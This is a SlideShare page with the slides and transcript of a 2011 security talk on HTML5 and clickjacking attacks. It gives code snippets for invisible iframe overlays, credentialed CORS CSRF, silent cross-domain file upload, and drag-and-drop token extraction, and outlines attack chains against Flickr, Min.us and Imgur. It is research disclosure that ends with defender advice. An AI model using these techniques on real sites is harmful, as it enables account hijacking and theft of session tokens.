Your SlideShare is downloading. ×
0
HTML5:Something wicked this way comesKrzysztof KotowiczSecuring                     1
About me• security researcher  • HTML 5  • UI redressing / clickjacking  • xss-track, squid-imposter, ...• pentester• IT s...
Plan• Same origin policy• Exploiting users• Attack gadgets• Wrap-up                   3
Same origin policy• the single most important security   concept for the web• restricts communication between   websites f...
Same origin policy• can be relaxed though  • crossdomain.xml  • document.domain  • HTML5 Cross Origin Resource Sharing• or...
Exploiting users Users• Like games  • 100 mln play social games //goo.gl/RRWlM• Are not security-savvy                     6
Exploiting users                       //goo.gl/DgPpY                   7
Combined attacks• Gadgets  • HTML5  • UI redressing• Join them• New attacks                    8
Gadgets  9
Basic clickjacking                 10
Basic clickjacking                      20x20   <iframe>                 11
Basic clickjacking                                   <iframe>                            -300             -350        20x2...
Basic clickjacking                                      <iframe>               Victim website                      20x20  ...
Basic clickjacking  <iframe src=outer.htmlwidth=20 height=20 scrolling=nostyle="opacity:0;"></iframe><!-- outer.html --><i...
Basic clickjacking• Trick: Click here to see a video!• User action: click+ Any clickable action+ Works in every browser-  ...
HTML5 IFRAME sandbox• Used to embed untrusted content   • prevents XSS   • prevents defacement• Facilitates clickjacking!<...
HTML5 IFRAME sandbox+ Chrome / Safari / IE 10+ Will disable most JS framebusters-   X-Frame-Option                     17
Cross Origin Resource Sharing• HTML5-ish• Cross domain AJAX• With cookies• Blind  • Unless the receiving site agrees• Not ...
Cross Origin Resource Sharingvar xhr = new XMLHttpRequest();    xhr.open("POST", "http://victim", true);xhr.setRequestHead...
Cross Origin Resource SharingPOST / HTTP/1.1Host: victimConnection: keep-aliveReferer: http://dev.localhost/temp/cors.phpC...
Silent file upload• File upload purely in Javascript• Silent <input type=file> with any file   name and content• Uses CORS...
Silent file uploadfunction fileUpload(url, fileData, fileName) {   var fileSize = fileData.length,     boundary = "xxxxxxx...
Silent file uploadvar body = "--" + boundary + rnContent-Disposition: form-data; name="contents"; filename=" + fileName + ...
Silent file upload+ No user action+ No frames+ Cross-domain, with cookies+ Works in most browsers+ You can add more form f...
Silent file upload                DEMO              Flickr.com                     25
Flickr.com attack toolbox• Remember me  • Flickr creates logged session on first     request• CSRF file upload  • http://u...
Drag into• Put attackers content into victim form                   27
Drag into                DEMO            Alphabet Hero                 28
Drag into• Trick: Put paper in the can!• User action: drag & drop, click+   Inject arbitrary content+   Trigger self-XSS- ...
Drag into Self-XSS in real life:• wordpress 0-day (Jelmer de Hen)   //goo.gl/dNYi5• chronme.com (sneaked.net)   //goo.gl/h...
Drag out content extraction    image                      image                 31
Drag out content extraction    image        victim      <iframe>                      image                 32
Drag out content extraction    image        victim      <iframe>                      textarea                        <tex...
Drag out content extraction<div id=game style="position:relative">    <img style="position:absolute;..."          src="pap...
Drag out content extraction                 35
Drag out content extraction                 36
Drag out content extraction$("#iframe").attr(src, outer.html’);$(#dropper).bind(drop, function() {    setTimeout(function(...
Drag out content extraction• Trick: Put paper in the can!• User action: drag & drop+ Access sensitive content cross domain...
Drag out content extraction              DEMO              Min.us                 39
Min.us attack toolbox• CORS to create gallery• social engineering  • extract gallery editor-id from <a href>• silent file ...
View-source• Display HTML source in frame  • session IDs  • tokens  • private data<iframe src="view-source:view-source:htt...
View-source              42
View-source              43
View-source• Trick: Your serial number is...• User action: select + drag & drop, copy-paste+   Beats JS framebusting+   Al...
View-source                DEMO              Imgur.com                 45
Imgur.com attack toolbox• framed view-source:  • captcha-like string (AdSense ID)  • session ID• social engineering:  • tr...
Summary• UI redressing attacks are improving• HTML5 helps exploiting   vulnerabilities• Users can be a weak link too!   De...
Links• html5sec.org• code.google.com/p/html5security• www.contextis.co.uk/research/white-papers/    clickjacking• blog.kot...
?49
Upcoming SlideShare
Loading in...5
×

Html5: something wicked this way comes

4,626

Published on

Talk given at SecurityByte 2011 conference.

All the demos can be searched for in http://blog.kotowicz.net

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
4,626
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
57
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Transcript of "Html5: something wicked this way comes"

  1. 1. HTML5:Something wicked this way comesKrzysztof KotowiczSecuring 1
  2. 2. About me• security researcher • HTML 5 • UI redressing / clickjacking • xss-track, squid-imposter, ...• pentester• IT security trainer • „Hacking HTML5” 2
  3. 3. Plan• Same origin policy• Exploiting users• Attack gadgets• Wrap-up 3
  4. 4. Same origin policy• the single most important security concept for the web• restricts communication between websites from different domains• has many flavors• without it hell breaks loose 4
  5. 5. Same origin policy• can be relaxed though • crossdomain.xml • document.domain • HTML5 Cross Origin Resource Sharing• or ignored... • by exploiting users • UI redressing (clickjacking) 5
  6. 6. Exploiting users Users• Like games • 100 mln play social games //goo.gl/RRWlM• Are not security-savvy 6
  7. 7. Exploiting users //goo.gl/DgPpY 7
  8. 8. Combined attacks• Gadgets • HTML5 • UI redressing• Join them• New attacks 8
  9. 9. Gadgets 9
  10. 10. Basic clickjacking 10
  11. 11. Basic clickjacking 20x20 <iframe> 11
  12. 12. Basic clickjacking <iframe> -300 -350 20x20 12
  13. 13. Basic clickjacking <iframe> Victim website 20x20 Like us, plz! 13
  14. 14. Basic clickjacking <iframe src=outer.htmlwidth=20 height=20 scrolling=nostyle="opacity:0;"></iframe><!-- outer.html --><iframe src="//victim" width=5000height=5000 style="position:absolute; top:-300px; left:-350px;"></iframe> 14
  15. 15. Basic clickjacking• Trick: Click here to see a video!• User action: click+ Any clickable action+ Works in every browser- X-Frame-Option- JS framebusting 15
  16. 16. HTML5 IFRAME sandbox• Used to embed untrusted content • prevents XSS • prevents defacement• Facilitates clickjacking!<iframe sandbox="allow-same-originallow-forms allow-scripts" src="//victim"></iframe> //html5sec.org/#122 16
  17. 17. HTML5 IFRAME sandbox+ Chrome / Safari / IE 10+ Will disable most JS framebusters- X-Frame-Option 17
  18. 18. Cross Origin Resource Sharing• HTML5-ish• Cross domain AJAX• With cookies• Blind • Unless the receiving site agrees• Not limited to <form> syntax• Used to trigger CSRF 18
  19. 19. Cross Origin Resource Sharingvar xhr = new XMLHttpRequest();    xhr.open("POST", "http://victim", true);xhr.setRequestHeader("Content-Type", "text/plain");xhr.withCredentials = "true"; // send cookiesxhr.send("Anything I want"); 19
  20. 20. Cross Origin Resource SharingPOST / HTTP/1.1Host: victimConnection: keep-aliveReferer: http://dev.localhost/temp/cors.phpContent-Length: 15Origin: http://dev.localhostContent-Type: text/plain...Cookie: my-cookie=myvalueAnything I want 20
  21. 21. Silent file upload• File upload purely in Javascript• Silent <input type=file> with any file name and content• Uses CORS• How? Create raw multipart/form-data 21
  22. 22. Silent file uploadfunction fileUpload(url, fileData, fileName) {   var fileSize = fileData.length,     boundary = "xxxxxxxxx",     xhr = new XMLHttpRequest();       xhr.open("POST", url, true);   xhr.withCredentials = "true";   xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);   xhr.setRequestHeader("Content-Length", fileSize); 22
  23. 23. Silent file uploadvar body = "--" + boundary + rnContent-Disposition: form-data; name="contents"; filename=" + fileName + "rnContent-Type: application/octet-streamrnrn + fileData + rn-- + boundary + --;xhr.send(body); 23
  24. 24. Silent file upload+ No user action+ No frames+ Cross-domain, with cookies+ Works in most browsers+ You can add more form fields- CSRF flaw needed- No access to response 24
  25. 25. Silent file upload DEMO Flickr.com 25
  26. 26. Flickr.com attack toolbox• Remember me • Flickr creates logged session on first request• CSRF file upload • http://up.flickr.com/photos/upload/transfer/ • accepts file uploads • token check skipped 26
  27. 27. Drag into• Put attackers content into victim form 27
  28. 28. Drag into DEMO Alphabet Hero 28
  29. 29. Drag into• Trick: Put paper in the can!• User action: drag & drop, click+ Inject arbitrary content+ Trigger self-XSS- Firefox only- X-Frame-Option- JS framebusting 29
  30. 30. Drag into Self-XSS in real life:• wordpress 0-day (Jelmer de Hen) //goo.gl/dNYi5• chronme.com (sneaked.net) //goo.gl/hs7Bw• Google Code vulns (Amol Naik) //goo.gl/NxKFY 30
  31. 31. Drag out content extraction image image 31
  32. 32. Drag out content extraction image victim <iframe> image 32
  33. 33. Drag out content extraction image victim <iframe> textarea <textarea> 33
  34. 34. Drag out content extraction<div id=game style="position:relative">   <img style="position:absolute;..." src="paper.png" />  <img style="position:absolute;..." src="trash.png" />      <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."> </iframe>   <textarea style="position:absolute; opacity:0;..." id=dropper></textarea></div> 34
  35. 35. Drag out content extraction 35
  36. 36. Drag out content extraction 36
  37. 37. Drag out content extraction$("#iframe").attr(src, outer.html’);$(#dropper).bind(drop, function() {    setTimeout(function() {        var urlmatch = $("#dropper").val() .match(/token=([a-h0-9]+)$/);        if (urlmatch) {            var token = urlmatch[1];            // do EVIL        }    }, 100);}); 37
  38. 38. Drag out content extraction• Trick: Put paper in the can!• User action: drag & drop+ Access sensitive content cross domain- Firefox only- X-Frame-Option- JS framebusting 38
  39. 39. Drag out content extraction DEMO Min.us 39
  40. 40. Min.us attack toolbox• CORS to create gallery• social engineering • extract gallery editor-id from <a href>• silent file upload to gallery• CORS change gallery to public• HTML5 + UI redressing combined! 40
  41. 41. View-source• Display HTML source in frame • session IDs • tokens • private data<iframe src="view-source:view-source:http://victim" width=5000 height=5000 style="position: absolute; top: -300px; left: -150px;"></iframe> 41
  42. 42. View-source 42
  43. 43. View-source 43
  44. 44. View-source• Trick: Your serial number is...• User action: select + drag & drop, copy-paste+ Beats JS framebusting+ Already earned $500 from Facebook- X-Frame-Options- Firefox only- Complicated user action 44
  45. 45. View-source DEMO Imgur.com 45
  46. 46. Imgur.com attack toolbox• framed view-source: • captcha-like string (AdSense ID) • session ID• social engineering: • trick to copy/paste page source• Exploitation: • http://api.imgur.com • cookie auth, no IP limits for session 46
  47. 47. Summary• UI redressing attacks are improving• HTML5 helps exploiting vulnerabilities• Users can be a weak link too! Devs: Use X-Frame-Options: DENY 47
  48. 48. Links• html5sec.org• code.google.com/p/html5security• www.contextis.co.uk/research/white-papers/ clickjacking• blog.kotowicz.net• github.com/koto Twitter: @kkotowicz kkotowicz@securing.pl 48
  49. 49. ?49
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×